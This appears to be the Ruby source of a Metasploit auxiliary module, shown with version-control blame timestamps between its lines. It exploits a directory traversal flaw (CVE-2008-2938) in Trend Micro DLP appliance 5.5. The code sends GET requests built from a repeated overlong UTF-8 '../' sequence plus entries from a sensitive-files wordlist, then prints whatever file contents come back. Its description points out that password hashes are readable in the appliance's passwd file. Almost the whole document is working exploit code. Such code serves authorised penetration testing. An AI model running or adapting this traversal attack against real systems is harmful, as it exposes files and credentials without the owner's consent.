2011-09-22 07:34:53 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-09-22 07:34:53 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
2016-03-08 13:02:44 +00:00
|
|
|
class MetasploitModule < Msf::Auxiliary
|
2011-09-22 07:34:53 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
include Msf::Auxiliary::Scanner
|
2011-09-22 07:34:53 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize
|
|
|
|
super(
|
2016-09-14 04:15:37 +00:00
|
|
|
'Name' => 'TrendMicro Data Loss Prevention 5.5 Directory Traversal',
|
|
|
|
'Description' => %q{
|
2013-08-30 21:28:54 +00:00
|
|
|
This module tests whether a directory traversal vulnerablity is present
|
|
|
|
in Trend Micro DLP (Data Loss Prevention) Appliance v5.5 build <= 1294.
|
|
|
|
The vulnerability appears to be actually caused by the Tomcat UTF-8
|
|
|
|
bug which is implemented in module tomcat_utf8_traversal CVE 2008-2938.
|
|
|
|
This module simply tests for the same bug with Trend Micro specific settings.
|
|
|
|
Note that in the Trend Micro appliance, /etc/shadow is not used and therefore
|
|
|
|
password hashes are stored and anonymously accessible in the passwd file.
|
|
|
|
},
|
2016-09-14 04:15:37 +00:00
|
|
|
'References' =>
|
2013-08-30 21:28:54 +00:00
|
|
|
[
|
|
|
|
[ 'URL', 'http://tomcat.apache.org/' ],
|
2016-07-15 17:00:31 +00:00
|
|
|
[ 'OSVDB', '47464' ],
|
|
|
|
[ 'OSVDB', '73447' ],
|
2013-08-30 21:28:54 +00:00
|
|
|
[ 'CVE', '2008-2938' ],
|
|
|
|
[ 'URL', 'http://www.securityfocus.com/archive/1/499926' ],
|
|
|
|
[ 'EDB', '17388' ],
|
|
|
|
[ 'BID', '48225' ],
|
|
|
|
],
|
2016-09-14 04:15:37 +00:00
|
|
|
'Author' => [ 'patrick' ],
|
|
|
|
'License' => MSF_LICENSE,
|
2016-09-14 00:37:04 +00:00
|
|
|
'DisclosureDate' => 'Jan 9 2009'
|
2013-08-30 21:28:54 +00:00
|
|
|
)
|
2011-09-22 07:34:53 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(8443),
|
|
|
|
OptBool.new('SSL', [true, 'Use SSL', true]),
|
|
|
|
OptPath.new('SENSITIVE_FILES', [ true, "File containing senstive files, one per line",
|
2013-09-26 19:34:48 +00:00
|
|
|
File.join(Msf::Config.data_directory, "wordlists", "sensitive_files.txt") ]),
|
2013-08-30 21:28:54 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
2011-09-22 07:34:53 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def extract_words(wordfile)
|
|
|
|
return [] unless wordfile && File.readable?(wordfile)
|
|
|
|
begin
|
|
|
|
words = File.open(wordfile, "rb") do |f|
|
|
|
|
f.read
|
|
|
|
end
|
|
|
|
rescue
|
|
|
|
return []
|
|
|
|
end
|
|
|
|
save_array = words.split(/\r?\n/)
|
|
|
|
return save_array
|
|
|
|
end
|
2011-09-22 07:34:53 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def find_files(files)
|
|
|
|
traversal = '/%c0%ae%c0%ae'
|
2011-09-22 07:34:53 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
res = send_request_raw(
|
|
|
|
{
|
|
|
|
'method' => 'GET',
|
|
|
|
'uri' => '/dsc/' + traversal*10 + files, # We know depth is 10
|
|
|
|
}, 25)
|
|
|
|
if (res and res.code == 200)
|
|
|
|
print_status("Request may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n#{res.body}")
|
|
|
|
@files_found << files
|
|
|
|
elsif (res and res.code)
|
|
|
|
vprint_status("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}")
|
|
|
|
end
|
|
|
|
end
|
2011-09-22 07:34:53 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def run_host(ip)
|
|
|
|
@files_found = []
|
2011-09-22 07:34:53 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
begin
|
|
|
|
print_status("Attempting to connect to #{rhost}:#{rport}")
|
|
|
|
res = send_request_raw(
|
|
|
|
{
|
|
|
|
'method' => 'GET',
|
|
|
|
'uri' => '/dsc/',
|
|
|
|
}, 25)
|
2011-09-22 07:34:53 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if (res)
|
|
|
|
extract_words(datastore['SENSITIVE_FILES']).each do |files|
|
|
|
|
find_files(files) unless files.empty?
|
|
|
|
end
|
|
|
|
end
|
2011-09-22 07:34:53 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if not @files_found.empty?
|
|
|
|
print_good("File(s) found:")
|
2011-09-22 07:34:53 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
@files_found.each do |f|
|
|
|
|
print_good(f)
|
|
|
|
end
|
|
|
|
else
|
|
|
|
print_good("No File(s) found")
|
|
|
|
end
|
2011-09-22 07:34:53 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
|
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
|
|
|
end
|
|
|
|
end
|
2011-09-22 07:34:53 +00:00
|
|
|
end
|